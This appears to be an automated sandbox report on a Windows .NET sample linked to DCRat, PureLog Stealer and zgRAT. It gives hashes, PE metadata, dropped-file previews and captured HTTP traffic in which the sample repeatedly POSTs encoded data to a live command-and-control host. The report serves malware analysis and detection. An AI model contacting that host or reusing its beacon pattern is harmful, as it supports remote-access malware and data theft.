	xoCq1tvPcm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	eu6OEBpBCI.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	IYXE4Uz61k.exe	Get hash	malicious	DCRat, PureLog Stealer, Xmrig, zgRAT	Browse
	gorkmTnChA.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	A5EbyKyjhV.exe	Get hash	malicious	DCRat	Browse

Process:	C:\Users\user\Desktop\6G8OR42xrB.exe
File Type:	ASCII text, with very long lines (684), with no line terminators
Category:	dropped
Size (bytes):	684
Entropy (8bit):	5.886244879928409
Encrypted:	false
SSDEEP:	12:qjO7SAHzN5sJPK2t+geoiqCPS1URSWHyJGrZoRHO4Rh+4EyHh:T7SgTsJPKsgqyS1URhevRh2Ch
MD5:	84A84BB8EA0614FB46EBFA0C4E113664
SHA1:	D4F8330228B680E7FE0BE3B8721B33AC44A5C19F
SHA-256:	74E228EE470F0F0A027C14512FA9CAB6AA8D1C5F04AD4686B3F75E16896FC0EC
SHA-512:	7E713453B17AB85EEB2CD98E479714395E08FE4C5064DB545F2468183A8C3567D213019A181FE52155C5455FC348FCC8F5A45398CDA25D67B9DCF54F8D6D88ED
Malicious:	false
Reputation:	low
Preview:	6bnZL052yyYKRxnZ1Gfb1MTRRwohFGFJExFOoQcBwAjvX7D5kYtHAFzuHWHYMXwrtOFdrZvlndo0mi3Tst7qW7I88VGRIDzYN1BI1kNKnIdgb8HicypdZGVvFHfWSedjoPmvgvcIfxDNdmh9NhyUYW9HfQCtE01Jp32LVWCrVg7mDHRdjfIupILRQfPQssEo53iktWo1fG81YWDX8iKisHdgrk4zHw8mcTrJjruN1RPiJU34c1RKif6yZC2IbyttHWYFp3yRy6ra24WXq9XQfyE6W2thzlvCifbx5yPiC9Vmxg6fpebcadOSRcswKQcMKp2Wdib2uzNfdcJ06O1UJTmERIfdGdXwhIbIojBGDjrkQszzS1z5ZID1CxEVC7vRbb8UAAMWNuQjlByiSpKOncWZFjF0fpEFxaIzufzSpcso1dPB9fCWxhn9EiOb4V1hqLwL28yx02jKusimTD19nrSQwJvLQXXUlK7prEJArPg58dPVAmH0d2493fZsNngceOjjv24P40SXLXST3aKnQg0sQ7wLoaxEsDat3qjIs16nkgygNGzwc3M7Y1SxGtldCOoI6iZN0C5ZkMItJP7ilAlz1dVCXwC8QdlW2pkpql6a8wWLsin0wC1BmzRcNXzEA7JHlw1dpS1AEL1EGKTzILLNljtCYHbSv2aAnPj6qJKe

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.621947447102293
Encrypted:	false
SSDEEP:	12:Pf95pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ndUOAokItULVDv
MD5:	CD4FA91B9F53B4670423769821280C40
SHA1:	59AAF3D89894B1F977A425A8A9C1E79463B5FE77
SHA-256:	2A1C4378967FBB0560D3AFBA6B8ACE8339F2F28997276A97AB4BA7173BB9644D
SHA-512:	AA787094D7DDD5663B7BD63691E1A3032241E775D51FC16752A0185D75B22AFEA103A5EC0A09C8F6323193989174C044FF05D772C83003F7A078E8F54A66540C
Malicious:	false
Preview:	..Pinging 093954 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	1.3786054531846224
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	6G8OR42xrB.exe
File size:	26'710'528 bytes
MD5:	b9c8dee5e0470b21d27b1a70afe25495
SHA1:	955aebc905591be2c45fb95ac689374552455b58
SHA256:	04069d6dc8c9b79d04e96c9cd2950a374abe0c2604110c27227f60a851da123d
SHA512:	995ea49bdcba082927264e6dca3ac5d45ad8e152a3c9d71b9f63881e10537f866b5f45e1634af5bc1c44fb36fb0ec48b1a0ece866e1f58d14c2dcc46a0c88cf7
SSDEEP:	98304:vS4Lhcl+62txet6kccrV00zSO76bgkVB:vS4yA62txY1cc0XOubtVB
TLSH:	C647E01AB2924F33C37417324697023E8291D7653992EF1F3A1F2197A84B7F18A725B7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Bg.................*0..........I0.. ...`0...@.. ........................0...........@................................

Entrypoint:	0x7049ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6742D31F [Sun Nov 24 07:17:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3049a0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x306000	0x320	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x308000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x3029f4	0x302a00	832077ccb2b3437572506d5aa2fda070	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x306000	0x320	0x400	f63dc44cdac0c40afaac3537ddfe2bda	False	0.3515625	data	2.6493052442009577	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x308000	0xc	0x200	09825251b50d3c13d5dc822a76bcdd58	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 21, 2024 11:07:29.384346962 CET	54577	53	192.168.2.4	1.1.1.1
Dec 21, 2024 11:07:29.778498888 CET	53	54577	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:29.910341024 CET	302	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:30.260318041 CET	336	OUT	Data Raw: 00 0b 04 07 06 0b 01 07 05 06 02 01 02 05 01 06 00 07 05 0b 02 02 03 00 02 04 0c 05 04 0f 00 05 0d 00 05 0a 01 00 06 02 0b 0b 05 0b 07 53 05 02 06 01 0e 0f 0d 05 01 00 06 52 04 0c 04 01 00 0a 03 04 0e 0e 05 53 01 01 0e 04 0d 04 0d 0c 0d 06 06 04 Data Ascii: SRSUVTRUQ\L}Q`X`qLbu`\|Ua`lU_k`loBl[{`[Z}}UQtdp~O~V@{}zuy
Dec 21, 2024 11:07:30.995126009 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:31.241374969 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCBuXEpXZ9RBRCHiobyIWlQ5uBoVhrGrUT1FYurhISrLxfZDWerbAIX6o56wyXM4C9az2lh9bu6GxB01PhrpNCUMGSCR04BBkmBmqk8Wj93IEcR2MRfSmlBZP0tFC0iSf9nvNnTA3dw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710c9be087cf6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4728&min_rtt=1921&rtt_var=6335&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=59882&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 35 35 34 0d 0a 56 4a 7e 4d 78 43 55 01 6c 62 5a 4b 7f 61 60 5e 7c 67 73 0d 68 06 66 52 7b 63 52 00 7e 5c 78 03 74 5d 58 52 6d 58 65 00 77 66 64 00 69 61 78 01 55 4b 71 09 63 61 60 59 6b 5b 7d 05 68 67 5f 53 7b 48 73 50 7e 63 78 5d 62 62 79 41 63 71 6d 47 68 61 62 03 7e 6f 7c 0c 7d 64 60 5f 62 5c 7b 06 7c 5c 71 04 7e 06 61 4a 78 59 7c 06 6f 59 60 06 7b 43 67 01 6e 5c 52 00 6f 60 7e 4c 7f 5e 74 44 6c 77 78 44 69 62 55 04 62 5f 60 48 7a 51 41 5b 6b 59 78 4f 68 61 57 0a 75 6c 68 02 6c 0a 64 05 74 60 62 0c 6d 4f 6e 58 6a 42 7a 04 6f 5f 71 59 76 70 67 01 61 5f 70 41 77 07 7e 50 7e 5d 7a 06 77 4c 6d 01 76 65 6b 50 7e 7c 66 59 77 7c 7b 5d 7f 70 7c 03 78 6c 60 5a 7a 70 66 03 6b 6d 6f 51 77 77 6f 5f 69 62 6e 09 7e 7d 63 0b 7b 6e 66 07 7e 72 71 4d 7b 5d 46 51 7c 42 7f 50 7d 60 52 08 7c 67 79 5c 78 6d 59 06 7b 62 7b 5a 68 5f 56 5e 7e 49 73 0a 6b 5e 7d 0c 6d 5a 7c 4d 6a 5c 7b 5a 74 63 57 51 7b 5c 79 00 76 48 5a 00 7d 76 68 4f 7f 76 7d 0b 76 62 59 02 7f 4c 79 4f 7f 59 66 0c 78 76 78 41 7c 73 51 02 75 72 5f 04 74 [TRUNCATED] Data Ascii: 554VJ~MxCUlbZKa`^\|gshfR{cR~\xt]XRmXewfdiaxUKqca`Yk[}hg_S{HsP~cx]bbyAcqmGhab~o\|}d`_b\{\|\q~aJxY\|oY`{Cgn\Ro`~L^tDlwxDibUb_`HzQA[kYxOhaWulhldt`bmOnXjBzo_qYvpga_pAw~P~]zwLmvekP~\|fYw\|{]p\|xl`ZzpfkmoQwwo_ibn~}c{nf~rqM{]FQ\|BP}`R\|gy\xmY{b{Zh_V^~Isk^}mZ\|Mj\{ZtcWQ{\yvHZ}vhOv}vbYLyOYfxvxA\|sQur_taq\|qTF\|xA~wYKwaw{\}}^[xYlN{I^xCcyr\|Izc\\|NZKxYt~\g@vqVG}R]K\|gpO\|_m@vl\|Lz\|pwpzzaa\|l~{qfFvcuOxtqnA~
Dec 21, 2024 11:07:31.241487026 CET	926	IN	Data Raw: 60 58 4d 74 5c 5f 07 77 75 70 09 7c 6c 61 05 77 42 60 42 7c 4d 78 4b 78 42 7b 4b 7b 60 66 06 7d 6d 52 0a 74 49 74 41 7f 62 72 09 7d 6d 55 41 78 7d 76 04 7e 72 71 4d 7c 60 68 0b 7d 6c 60 41 7f 70 56 09 7e 67 50 4d 7b 6d 51 44 78 4c 64 46 7c 5f 51 Data Ascii: `XMt\_wup\|lawB`B\|MxKxB{K{`f}mRtItAbr}mUAx}v~rqM\|`h}l`ApV~gPM{mQDxLdF\|_Q}Yspiz]t~L`IwM}zqiuXtJ\|fZOfmOwrJ\|r}BIPAyvxA~]{GurqNtOa\|O~lpwQvaw{rq~`_xgpCyw^x}z\\|xMT{]NZlwpDi[gv\|H\|\|\|gd\|ayCalNz\|ptsbnXaG}Bv_z\y
Dec 21, 2024 11:07:31.293378115 CET	278	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 384 Expect: 100-continue
Dec 21, 2024 11:07:31.607621908 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:31.607817888 CET	384	OUT	Data Raw: 5c 5b 43 58 5f 5b 55 58 54 5d 59 5a 55 5e 57 56 56 50 5c 5f 52 53 5b 58 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: \[CX_[UXT]YZU^WVVP\_RS[XYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!A)-\<'+D?<!Y%(***Z(:( +88X"8&='[$.Y!;
Dec 21, 2024 11:07:32.070884943 CET	962	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=904do9T80QVVixP5gzHMummnV%2Bu9y%2FQKr6r3Veo4hfq%2FIVHP7PXhywsqQUeewMej26QYCceGQYA3S05X1h5fBVLutUcko3w8Z1iaDxOaXjIhELGqtw5Ukkbj83BEPtU0nsQqWtOq%2FaY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710cd889b7cf6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6525&min_rtt=1921&rtt_var=8357&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2212&recv_bytes=1300&delivery_rate=2203219&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0f 13 39 10 24 05 32 11 2a 29 3f 5b 28 3f 2e 0a 28 3c 22 15 2e 22 2d 17 33 1d 34 1c 2c 05 29 1b 28 33 04 01 2a 2d 01 08 28 51 2f 5a 2b 38 2e 58 03 11 24 5e 36 3a 02 02 2b 06 0c 0a 3a 3b 26 03 23 2d 3c 04 2d 06 3d 1e 32 00 07 0d 21 04 27 1d 2f 57 23 0a 2f 5f 3f 5e 31 09 2c 0c 26 14 2e 53 0c 16 21 02 2a 5b 3d 5a 32 01 29 10 27 51 39 0b 20 36 2b 0f 20 2b 37 08 30 3c 32 5a 30 00 3c 57 29 30 07 1c 2b 01 3d 19 3f 39 35 19 3f 11 26 55 2e 01 22 53 04 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 989$2)?[(?.(<"."-34,)(3-(Q/Z+8.X$^6:+:;&#-<-=2!'/W#/_?^1,&.S!*[=Z2)'Q9 6+ +70<2Z0<W)0+=?95?&U."S=ZP0
Dec 21, 2024 11:07:32.189333916 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 1728 Expect: 100-continue
Dec 21, 2024 11:07:32.503451109 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:32.503675938 CET	1728	OUT	Data Raw: 59 5d 43 59 5f 5e 50 59 54 5d 59 5a 55 50 57 51 56 5d 5c 54 52 56 5b 5f 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: Y]CY_^PYT]YZUPWQV]\TRV[_YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!=>,$V>>,+&+:Y+>*#?(;+6(;R2'[$.Y!
Dec 21, 2024 11:07:33.011532068 CET	964	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKTkFSH3hVdLgCOBS6tu9EY3Q3Xu40nhkJ7e%2FMbyKKdxGAEmBXjoMMBrUEFLp9%2FzSHmwp5hZYBxf%2B%2Bl6HznXlieQt5qhPQykumt1LJmqOi7lIBLCf2pxPSmSci96EgGJwy16mU0di1U%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710d32c047cf6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7232&min_rtt=1915&rtt_var=8107&sent=13&recv=14&lost=0&retrans=0&sent_bytes=3199&recv_bytes=3307&delivery_rate=2203219&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0f 13 39 1d 30 3b 00 5f 29 17 38 06 3f 02 21 52 2b 2c 3d 01 2f 0c 31 5c 30 23 3b 00 2c 02 22 0b 3c 23 25 59 2b 3d 27 09 3f 51 37 5b 2b 28 2e 58 03 11 27 02 21 2a 2b 58 28 28 35 52 39 2b 3a 04 34 13 33 5d 2e 16 25 56 32 00 2e 53 35 2a 0e 0f 2e 21 38 1f 38 29 0e 07 26 27 33 55 31 04 2e 53 0c 16 21 00 3e 03 2d 11 32 2c 39 1f 24 37 2a 55 22 40 23 0a 20 28 3f 0a 27 3c 08 59 24 3e 3f 0a 2b 23 39 1e 28 01 0c 09 3f 39 2a 0b 28 3b 26 55 2e 01 22 53 04 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 9890;_)8?!R+,=/1\0#;,"<#%Y+='?Q7[+(.X'!+X((5R9+:43].%V2.S5.!88)&'3U1.S!>-2,9$7U"@# (?'<Y$>?+#9(?9(;&U."S=ZP0
Dec 21, 2024 11:07:33.041229963 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:33.355396986 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:33.355595112 CET	2292	OUT	Data Raw: 59 52 43 5b 5f 5d 50 52 54 5d 59 5a 55 5d 57 5e 56 5a 5c 5f 52 5e 5b 5d 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YRC[_]PRT]YZU]W^VZ\_R^[]YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!=(?'<>$<-X25* (X=<<;(^!+V2='[$.Y!7
Dec 21, 2024 11:07:33.831420898 CET	811	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XpplMMerYDP7UUCXclpSplaAZMgz0TEELgPlwKZpF3NdDSIoI3QhSMLPvbRR96IAtFhqpB4OnCQuv9K18tdL%2BAxXZAIFKcwiYL2R78CfFWl4DqH0dj5A%2FvxSjKE7p0qfMc29zG4gnww%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710d87f817cf6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8694&min_rtt=1915&rtt_var=9776&sent=18&recv=19&lost=0&retrans=0&sent_bytes=4188&recv_bytes=5878&delivery_rate=2203219&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:31.532006025 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2288 Expect: 100-continue
Dec 21, 2024 11:07:31.897702932 CET	2288	OUT	Data Raw: 59 52 46 5c 5a 5d 50 5c 54 5d 59 5a 55 58 57 5e 56 5d 5c 55 52 55 5b 5c 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YRF\Z]P\T]YZUXW^V]\URU[\YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!=*]((W(>C??6&+=V>;X+"( T?(^#+#2-'[$.Y!
Dec 21, 2024 11:07:32.618983984 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:32.865355968 CET	804	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NmvfWx3TZuRdU9PZN4tK8SZGAceNTYs7kdsbIiB6qCP0WFpjvGL3qa8e1Gm9jUOhB9LrRdIsypKzoo0RjJbsYs06wo8vVnKGn135l8ofFQuZ2RuvyuXNxIW%2BE0E0ppWo3ln053pRsEE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710d3db3243c2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2774&min_rtt=1568&rtt_var=3001&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2567&delivery_rate=130101&cwnd=151&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:34.690282106 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2288 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:35.040878057 CET	2288	OUT	Data Raw: 5c 5c 46 5e 5a 5e 50 58 54 5d 59 5a 55 58 57 50 56 5b 5c 5a 52 50 5b 59 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: \\F^Z^PXT]YZUXWPV[\ZRP[YYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!-6Y+//?>#E?&^:)#Y(.P( V(+8"+?V&='[$.Y!;
Dec 21, 2024 11:07:35.786897898 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:36.021339893 CET	807	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FIF4QPZNoKWxVUNjHaijDhcw3e62dwhoYvUA40SJ0oE0OGPsbJCS06Ryfd88UneYAlWs76OHjoxNXDEDHGfub3%2BKi6CdzxHbcg0utO6sOzJs2niOI9G%2BGmSH7CqHyNuhaRVP7xOXuM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710e79b06de98-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4030&min_rtt=1471&rtt_var=5671&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2591&delivery_rate=66514&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:36.477547884 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:36.822056055 CET	2292	OUT	Data Raw: 59 52 43 5c 5f 5d 50 5a 54 5d 59 5a 55 51 57 56 56 5d 5c 59 52 55 5b 56 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YRC\_]PZT]YZUQWVV]\YRU[VYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!B>-!>/8T<>C(X&+5=:8(-<W+?"++2'[$.Y!
Dec 21, 2024 11:07:37.576237917 CET	25	IN	HTTP/1.1 100 Continue
